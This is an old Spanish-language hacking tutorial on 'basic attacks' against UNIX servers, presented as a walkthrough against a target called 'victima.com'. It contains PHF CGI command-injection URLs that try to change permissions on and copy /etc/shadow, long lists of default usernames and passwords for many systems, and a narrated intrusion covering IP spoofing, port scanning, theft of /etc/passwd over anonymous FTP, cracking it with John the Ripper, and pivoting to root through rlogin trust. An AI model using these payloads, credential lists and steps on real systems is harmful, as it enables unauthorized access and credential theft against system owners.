ATAQUES BASICOS

Claramente observamos que numero octal corresponde a cada caracteristica de un archivo o directorio en un sistema UNIX. Pasemos pues a poner en uso todo lo aprendido hasta ahora.
Como dijimos antes el comando utilizado por los S.O UNIX para establecer permisos recibe el nombre de chmod. A la hora de dar permisos en forma absoluta hemos de seguir la siguiente Sintaxis: 'chmod XYZ archivo'.
X representa al due¤o del archivo, Y al grupo y Z al resto de usuarios, mientras que 'archivo' es el nombre del archivo a especificar los permisos. Siempre que queramos atribuir mas de un permiso los numeros octales se sumaran
************************************************************************
Este cuadro de texto es gentileza de JJF/Hackers Team
Es decir que si queremos darle permiso de lectura escritura y ejecución al archivo sahdow el comando a ejecutar seria el siguiente :
chmod 407 shadow
Con este comando no el archivo quedara con los siguientes atributos .
-r-----rwx 1 0 sys 27348 May 20 15:38 /etc/shadow

Lo cual nos indica que el propietario del archivo tiene acceso solo a la lectura del archivo , el grupo querda sin ningun derecho sobre el archivo mientras el resto de los usuarios pueden leerlo , escribirlo y ejecutarlo .

Veamos la parte practica , aunque lo veo dificil ya que habiamos visto que el archivo solo lo podía leer el systema , cosa que solamente el root podía variar , es decir el comando chmod solo tendria efecto en este archivo si fuese el Root el que lo ejecutara , pero sigamos probando quien sabe ??
http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/chmod%20407%20/etc/shadow
Query Results
/usr/local/bin/ph -m alias=x /bin/chmod 407 /etc/shadow

Veamos que sucedió ............:-)
http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20-l%20/etc/shadow
Query Results
/usr/local/bin/ph -m alias=x /bin/ls -l /etc/shadow
-r-------- 1 0 sys 27348 May 20 15:38 /etc/shadow
Nada , bueno me lo imaginaba .... que lata ...
Probemos la siguiente técnica , trataremos de copiar el archivo a otro
a ver que pasa .

http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cp%20/etc/shadow%20/etc/pass.txt
Query Results
/usr/local/bin/ph -m alias=x /bin/cp /etc/shadow /etc/pass.txt

Bueno aki lo que tratamos de hacer es copiar el shadow a un archivo llamado pass.txt
veremos que pasa .

http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20-l%20/etc/pass.txt
Query Results
/usr/local/bin/ph -m alias=x /bin/ls -l /etc/pass.txt

Fuck , no fue posible no pudimos copiarlo .. que lata ..

Bueno que importa .. trataremos de buscar otros metodos , pero aprovechando esta falla podemos ver los directorios , los archivos etc.. , las posibilidades son infinitas .
Bueno busquemos otra tecnica de entrar al sistema ..
FUERZA BRUTA
***********************************************************************

Esta técnica es mas que basica pero funciona , se trata de utilizar las cuentas default que trAen los sitemas , es decir ; Normalmente los sistemas traen cuentas que vienen por defecto , como el usr_template o guest en novell , o el guest de windows NT . . Aki va un listado de cuentas default de diferentes sistemas .


Cuentas por defecto
-------------------
AIX
~~~
guest guest


AS/400
~~~~~~
qsecofr qsecofr
qsysopr qsysopr
qpgmr qpgmr
ibm password
ibm 2222
ibm service
qsecofr 1111111
qsecofr 2222222
qsvr qsvr
secofr secofr

DECserver
~~~~~~~~~
ACCESS
SYSTEM

HP-x000
~~~~~~~
Este sistema es elaborado por Hewlett-Packard. Se caracteriza por el prompt ":". La secuencia de entrada a este sistema es una de las m s complicadas. Debes escribir: "HELLO SESSION NOMBRE,USUARIO,NOMBRE-DE-CUENTA,GRUPO" Afortunadamente algunos de esos campos pueden dejarse en blanco. En ocasiones todos los campos est n protegidos con passwords por lo que este sistema no es uno de los m s faciles de acceder.
Las cuentas defaults comunes son:

Login User
~~~~~ ~~~~
MGR.TELESUP,PUB MGR
Acct: HPONLYG rp: PUB
MGR.HPOFFICE,PUB
FIELD.SUPPORT,PUB FLD,
MAIL.TELESUP,PUB MAIL,
MGR.RJE
FIELD.HPP189 ,HPP187,HPP189,HPP196
MGR.TELESUP,PUB,HPONLY,HP3


Hewlett Packard MPE-XL
~~~~~~~~~~~~~~~~~~~~~~
HELLO MANAGER.SYS
HELLO MGR.SYS
HELLO FIELD.SUPPORT HPUNSUP or SUPPORT or HP
HELLO OP.OPERATOR
MGR CAROLIAN
MGR CCC
MGR CNAS
MGR CONV
MGR COGNOS
OPERATOR COGNOS
MANAGER COGNOS
OPERATOR DISC
MGR HPDESK
MGR HPWORD
FIELD HPWORD
MGR HPOFFICE
SPOOLMAN HPOFFICE
ADVMAIL HPOFFICE
MAIL HPOFFICE
WP HPOFFICE
MANAGER HPOFFICE
MGR HPONLY
FIELD HPP187
MGR HPP187
MGR HPP189
MGR HPP196
MGR INTX3
MGR ITF3000
MANAGER ITF3000
MAIL MAIL
MGR NETBASE
MGR REGO
MGR RJE
MGR ROBELLE
MANAGER SECURITY
MGR SECURITY
FIELD SERVICE
MANAGER SYS
MGR SYS
PCUSER SYS
RSBCMON SYS
OPERATOR SYS
OPERATOR SYSTEM
FIELD SUPPORT
OPERATOR SUPPORT
MANAGER TCH
MAIL TELESUP
MANAGER TELESUP
MGR TELESUP
SYS TELESUP
MGE VESOFT
MGE VESOFT
MGR WORD
MGR XLSERVER


Major BBS
~~~~~~~~~
Sysop Sysop


PICK O/S
~~~~~~~~
DSA
DS
DESQUETOP
PHANTOM


Prolog
~~~~~~
PBX PBX
NETWORK NETWORK
NETOP null


Rolm
~~~~
CBX Defaults
op op
op operator
su super
admin pwp
eng engineer

PhoneMail Defaults
~~~~~~~~~~~~~~~~~~
sysadmin sysadmin
tech tech
poll tech

RSX
~~~
SYSTEM/SYSTEM (Username SYSTEM, Password SYSTEM)
1,1/system (Directory [1,1] Password SYSTEM)
BATCH/BATCH
SYSTEM/MANAGER
USER/USER
MICRO/RSX

System 75
~~~~~~~~~
bcim bcimpw
bciim bciimpw
bcms bcmspw, bcms
bcnas bcnspw
blue bluepw
browse looker, browsepw
craft crftpw, craftpw, crack
cust custpw
enquiry enquirypw
field support
inads indspw, inadspw, inads
init initpw
kraft kraftpw
locate locatepw
maint maintpw, rwmaint
nms nmspw
rcust rcustpw
support supportpw
tech field

Taco Bell
~~~~~~~~~
rgm rollout
tacobell null

Verifone Junior 2.05
~~~~~~~~~~~~~~~~~~~~
Default password: 166816

VMS
~~~

La computadora VAX es creada por Digital Equipment Corporation (DEC) y corre el sistema operativo VMS (virtual memory system). VMS se caracteriza por su prompt 'Username:'. Este sistema no te dir si has entrado un login correcto o no y te desconectar despu‚s de tres malos intentos. Tambi‚n mantiene un record de todos los logins que fallaron e informa al due¤o de la cuenta la pr¢xima vez que entre cuantos intentos fallados se hicieron. Es uno de los sistemas m s seguros desde fuera pero ya dentro tiene varios errores en la seguridad. Las VAX ademas tienen uno de los mejores archivos de ayuda de entre los dem s sistemas, para acceder a esta ayuda s¢lo escribe HELP en el prompt.

Las cuentas defaults comunes son: [ usuario: password [,password] ]

Login Password
~~~~~ ~~~~~~~~
decnet decnet
demo
demo demo
field field
field service
guest
guest guest
operator operator
sysmaint digital
sysmaint service
sysmaint sysmaint
system manager
system operator
system syslib
system system
systest uetp


UNIX
~~~~
Las cuentas defaults comunes son:

Login Password
~~~~~ ~~~~~~~~
adm adm
adm admin
admin adm
admin admin
bin bin
daemon daemon
decnet ddennet
decnet nonpriv
default user
demo demo
field digital
field service
field test
games games
games player
guest friend
guest guest
guest welcome
host host
learn learn
netnonpriv nonpriv
nuucp nuucp
postmaster mail
rje rje
root root
root sysop
root system
sys sys
sys system
sysop sysop
sysman sys
sysman sysman
sysman system
sysadmin adm
sysadmin admin
sysadmin sys
sysadmin sysadmin
sysadmin system
sysbin sysbin
sysmaint digital
sysmaint service
system manager
system operator
system syslib
system uetp
systest_clig systest
test test
tty tty
unix test
unix unix
userp user
uucp uucp
uuhost uuhost
who who

PRIME
~~~~~

Esta computadora opera con el sistema operativo Primos. Son f ciles de detec- tar ya que reciben a uno con el mensaje "Primecon xx.xx.xx" o algo parecido dependiendo de la versi¢n que te encuentres. Usualmente no ofrecen ning£n prompt as¡ que debes escribir "login usuario". Si la versi¢n es anterior a la 18.00.00 puedes presionar un mont¢n de caracteres de escape o CTRL-C y en- trar s. Este sistema ofrece la capacidad de conectarte a los NUAS de todo el mundo con el comando NETLINK...sintax: nc nua

Las cuentas defaults comunes son:
Login Password
~~~~~ ~~~~~~~~
guest guest
guest prime
guest1 guest
netlink netlink
prime prime
prime primos
primos prime
primos primos
primos_cs prime
primos_cs primos
primenet primenet
system prime
system primos
system system
test test
test prime
test primos


DEC-10
~~~~~~

Este es el equipo de c¢mputo m s nuevo que existe dentro de la linea de DEC's. Operan el sistema operativo TOPS-10. Este tipo de m quinas se reconocen por el prompt "." Las series DEC-10/20 son amables con los hackers permitiendo varios intentos en el login prompt sin guardar un log de los intentos fallados. Las cuentas est n en forma [xxx,yyy]. Lo mejor de este sistema es la posibilidad de obtener informaci¢n sobre las personas en l¡nea antes de entrar a ‚l usando el comando systat. Si ves una cuenta que lea [234,1001] BOB JONES, ser¡a inteligente probar como password BOB, JONES, BOBBY, etc. Para entrar al sis- tema se usa el comando: login xxx,yyy [enter] password:

Este sistema como antes hab¡a dicho, permite intentos sin limite y adem s te avisa si el login que est s usando existe.
Las cuentas defaults comunes son:
Login Password
~~~~~ ~~~~~~~~
1,2 manager 1,2 operator
1,2 syslib
2,7 maintain
5,30 games

IRIS
~~~~

Iris significa (interactive real time information system). Originalmente corr¡a en PDP-11's, pero ahora corre en otras minis. Para identificar uno de estos sistemas busca el texto "Welcome to `IRIS' R9.1.4 Timesharing" y el prompt ACCOUNT ID? (algunas veces es cambiado). IRIS no tiene limites a la hora de hackear una cuenta y no guarda un log de los intentos fallados.

Login
~~~~~
accounting
boss
demo
manager
pdp8
pdp11
software

VM/CMS
~~~~~~

Este sistema es ejecutado en las super computadoras de IBM (International Business Machines) llamadas mainframes. Una vez conectado a una de estas computadoras te mostrar un mensaje asi "VM/370 ONLINE", y te dar un prompt "." justo como la TOPS-10 lo hace. Para entrar debes ejecutar: LOGON
Las cuentas defaults comunes son:
Login Password
~~~~~ ~~~~~~~~
autolog1 autolog
autolog1 autolog1
cms cms
cmsbatch cms
cmsbatch cmsbatch
erep erep
maint maint
maint maintain
operatns operatns
operatns operator
operator operator
rscs rscs
smart smart
sna sna
vmtest vmtest
vmutil vmutil
vtam vtam

NOS
~~~

NOS significa Networking Operating System y corre en la Cyber computadora hecha por Control Data Corp. A este sistema lo puedes identificar f cilmente por la bienvenida "WELCOME TO THE NOS SOFTWARE SYSTEM...". El primer prompt que recibir s sera FAMILY: (presiona enter) depu‚s llegar s a otro prompt USER NAME: donde cada uno es de 7 digitos alfanumericos y son dependientes del sistema por lo que no son palabras o frases conocidas.

DECSERVER
~~~~~~~~~

Las DECs son una serie de computadoras conectadas entre s¡ para formar una s¢la unidad de procesamiento, la funcionalidad de estos sistemas es altamente utilizado por los hackers para quebrar passwords de cuentas unix por la rapidez del sistema. El prompt usualmente sera: "Enter Username>" aunque yo he visto otros prompts en estos sistemas. El nombre de usuario puede ser cualquier cosa, lo mejor ser presionar algo nada sospechoso como `c' o alg£n n£mero. De ah¡ te presentar con el prompt `local>'. De ah¡ debes ejecutar `c ' para conectarte. Para obtener una lista de sistemas conectados ejecuta `sh' `services' o `sh nodes'. En algunos sistemas DEC'S existen comandos como MODEM o DIAL que permiten hacer uso de un m¢dem para llamadas externas que te permitir n marcar a BBS internacionales a expensas de la compa¤¡a que opera el DEC.


******** Listado extraido del Web de RAREGAZZ ****************************

Bueno nos conectamos a la victima con condon o en ultima instancia a travez del teledit , despues de tratar con varias cuentas llegue a lo siguiente :-p .

UNIX(r) Sytem Release 4.0
login:userpordefecto
password:passpordefecto
No directory! login in with home= / etc....

Bingo entre en el sistema ... pero a los segundos me desconecta . No me da acceso por la
dirección ip , pero es algo simple de solucionar vamos a hacer ipspoff (falsear ip) para entrar.
UNIX(r) Sytem Release 4.0

login:userpordefecto
password:passpordefecto
login incorrect


Shit nos cacharon , el administrador debe haber notado que trataron de entrar en su sistema con esa cuenta. Bueno que podemos hacer .. mmm ya se me ocurre algo en el articulo anterior gracias al finger pudimos ver la direccion ip del root , eso significa que podemos chequear si podemos conectarnos a su maquina .. mmm veremos que podemos hacer .

Hacemos un escaneo de puertos a la direccion ip del Root , si es que podemos jejeje .- Manos a la obra .-

El primer paso es saber si el Root esta conectado a Inet o que no este dentro de una red interna de tal forma que podamos conectarnos a este ,..,, de lo contrario estamos fritos ... veamos .. hacemos entonces un ping a la direcciòn ip del Root .-

C:\WINDOWS>ping iproot

Pinging xxx.xx.xxx.xx with 32 bytes of data:

Reply from xxx.xx.xxx.xx: bytes=32 time=562ms TTL=46
Reply from xxx.xx.xxx.xx: bytes=32 time=431ms TTL=46
Reply from xxx.xx.xxx.xx: bytes=32 time=1001ms TTL=46
Reply from xxx.xx.xxx.xx: bytes=32 time=351ms TTL=46

Excelente .. el root esta conectado directamente a inet sin la utilizaciòn
de ningun proxy server
.. y al parecer sin estar detras de algun firewall .. esperemos .

Ahora tomamos nuestro programa escaneador de puertos y observemos que nos depara el destino .... el resultado fue el siguiente .-
port 21 found. Desc='ftp'
port 23 found. Desc='telnet'
port 25 found. Desc='smtp'
port 37 found. Desc='time'
port 70 found. Desc='gopher'
port 79 found. Desc='finger'
port 80 found. Desc='www'
port 109 found.Desc='pop'
port 110 found. Desc='pop3'
port 113 found. Desc='auth'
port 143 found.
port 513 found. Desc='login/who'
port 514 found. Desc='shell/syslog'
port 515 found. Desc='printer'

Volvemos al procedimiento anterior .. o sea a los ya repasados en el nuemro uno .. veamos .-

Provemos el FTP !!!
C:\WINDOWS>ftp victima.com
Connected to victima.com.
220 www.victima.com FTP server (Version wu-2.4
:37:21 EST 1997) ready.
User (victima.com:(none)): anonymous
331 Guest login ok, send your complete e-mail
Password:
230-The response 'guest' is not valid
230-Next time please use your e-mail address a
230- for example: [email protected]
230-Welcome, archive user! This is an experim
230-unusual problems, please report them via e
230-If you do have problems, please try using
230-of your password -- this will turn off the
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
ftp> cd etc
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
ftp> get passwd
200 PORT command successful.
150 Opening ASCII mode data connection for passwd (79 bytes).
226 Transfer complete.
84 bytes received in 0.05 seconds (1.68 Kbytes/sec)
ftp> by
221 Goodbye.


Mmmm lo que que acabamos de hacer fue conectarnos por Ftp con nuestra vicitma , luego nos fuimos al subdirectorio etc y ejecutamos un dir .. lo cual no nos mostro nada , pero de igual manera probamos coger en passwd con el comando get y nos resulto esto significa que el archivo passwd solo estaba oculto pero no tenia ningun derecho en especial . Ahora solo tenemos que crackear el fichero para obtener las contraseñas para entrar en este server . Hay muchos programas que cumplen esta funcion pero el mas rapido y efectivo que conozco es el John the ripper .

Como crackearlo aki van unos ejemplos --- dados por nuestro amigo TAkER

------------------------------------------------------------------------
john -single passwd
Este metodo toma el nombre del usuario y apartir de el empieza a buscar
haciendo diferentes
combinaciones..=====> Javier Suarez buscara Jsuarez, JavierS,
Sjavier...etc..
---------------------------------------------------------------------------------------------
john -wordfile:lista_de_palabras passwd
Este toma un archivo de palabras y lo compara contra todos los passwd
del file a crackear
por lo tanto te toca conseguir una lista de palabras, /modo propaganda
on/ por alla en mi
pagina en la seccion de archivos encontraras un sitio FTP donde podras
bajar como nmil listas
de palabras pa que empieces a probar el john /modo propaganda off/
---------------------------------------------------------------------------------------------
john -incremental:all passwd
Este metodo es algo como de fuerza bruta, por que prueba todas las
combinaciones posibles y
de seguro algo conseguiras...lo malo es que es demasiado lento.
---------------------------------------------------------------------------------------------
heyyy casi lo olvido, hay una opcion buenisima...
john -restore
Inicia el john desde donde terminaste la ultima sesion, es buena en caso
de que te toque
suspender el trabajo por algun motivo, no la he ensayado en todas, pero
debe servir lo mismo
---------------------------------------------------------------------------------------------

Ahora ya tenemos un user y password para entrar en la maquina del root ahora vamos al ataque .
nos logearemso al equipo del ROOT si es que las claves que crackeo nuestro john son correctas ,
a todo esto paciencia que puede demorarse bastante en desencriptar las password , en especial
si usas el metodo incrmental ... john -i passwd .

login:root
password:********

Welcome at .............. last login bla bla bla!!!!!

root> rlogin victima.com
...
welcome at vicitma.com ..............



Bien nos ha dado resultado !!!!
Lo que acabamos de hacer es logearnos al equipo de donde se conecta el root , que en este caso es otro server UNIX , ya que a este fue al cual pudimos sacarle el fichero passwd , ahora estando adentro provamos hacer un rlogin a la maquina victima , normalmente cuando el root se conecta desde otra maquina , para evitarse estar introduciendo el login y passwd a cada rato , crea a su maquina en
un archivo ubicado en etc/.hosts , cuando nos referimos a maquinas nos referimos a sus direcciones ip , es decir que si tu tienes una cuenta shell o trabajas con linux y pudes meter tu ip en este fichero ,al hacer un rlogin no te pedira ni login ni passwd .... Es asi como entramos al sistema como ROOT sin correr ningun exploit pero si con bastante trabajo como veran.